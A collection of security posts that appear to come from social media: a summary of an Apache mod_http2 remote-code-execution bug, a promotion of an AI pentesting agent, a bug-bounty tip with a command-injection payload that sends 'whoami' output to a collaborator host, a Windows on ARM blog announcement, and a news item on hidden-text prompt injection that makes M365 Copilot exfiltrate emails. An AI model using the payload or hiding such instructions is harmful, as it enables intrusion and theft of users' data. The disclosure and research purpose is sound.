pentesting

CVE-2026-23918 - a pre-auth RCE in Apache httpd's mod_http2, found by Striga during our open-source research. The bug triggers on a single HTTP/2 connection sending HEADERS followed by RST_STREAM with a non-zero error code. Two nghttp2 callbacks both push the same stream pointer onto the cleanup array, and the second pool_destroy hits already-freed memory. We built a working RCE on x86_64 using mmap reuse and Apache's scoreboard memory as a stable container for fake cleanup structures. Affects Apache httpd 2.4.66 with mod_http2 and a multi-threaded MPM. Full technical writeup coming soon. https://t.co/SI7p0zQToj https://t.co/DcQSMnwhPx

someone built AI HACKERS that actually EXPLOIT your app and prove every vulnerability with a working proof-of-concept your security scanner says possible SQL injection this writes the actual exploit, runs it, confirms it works ZERO false positives, every finding comes with real proof its called Strix, open source tool teams of AI agents coordinate like a real pentest squad, one does recon and maps your attack surface, another probes auth and session handling, another writes actual exploits and confirms they work point it at source code, a github repo, or a live URL, handles all three full hacker toolkit built in, http proxy for request manipulation, headless browser for XSS and CSRF, terminal for command injection, python runtime for custom exploits finds an IDOR? it doesnt flag possible it logs in as user A, requests user B invoice, confirms unauthorized access, saves the full request/response chain as proof actual dynamic exploitation inside a sandboxed docker container plug it into GitHub Actions, it scans every pull request and BLOCKS merges that introduce vulnerabilities, continuous pentesting on every PR, not one annual audit a professional pentest costs $15-50K and takes 2-4 weeks Snyk and Veracode charge $10-30K/year and still flag possible vulnerabilities you have to manually verify anyway this is > pip install strix-agent and every single finding already has a working exploit attached

☠️Blind Remote Code Execution🔥 ✅POC: curl -X POST -d \"user=$(whoami)\" http://BURP_LINK" Join my BugBounty Telegram Channel: https://t.co/LeJHHPweci some time targets might vulnerable but not give you the output. so never forget to try your burp collaborator to get the output. NOTE: always check `User-Agent` Header in your burp collaborator responds, if here you got curl means RCE.

Today I am releasing a new blog on Windows on ARM! It comes from the perspective of one, like myself, who comes from an x86 background and is new, but, interested in Windows on ARM! ELs, OS & hypervisor behavior (with VBS), virtual memory, paging, & more! https://t.co/jUHls4wupu

🚨 M365 Copilot Prompt Injection Vulnerability Allows Attackers to Exfiltrate Sensitive Data Read more: https://t.co/NhCFFUk90p A sophisticated vulnerability in Microsoft 365 Copilot (M365 Copilot) that allows attackers to steal sensitive tenant data, including recent emails, through indirect prompt injection attacks. The attack begins when a user asks M365 Copilot to summarize a maliciously crafted Excel spreadsheet. Hidden instructions, embedded in white text across multiple sheets, use progressive task modification and nested commands to hijack the AI’s behavior. #cybersecuritynews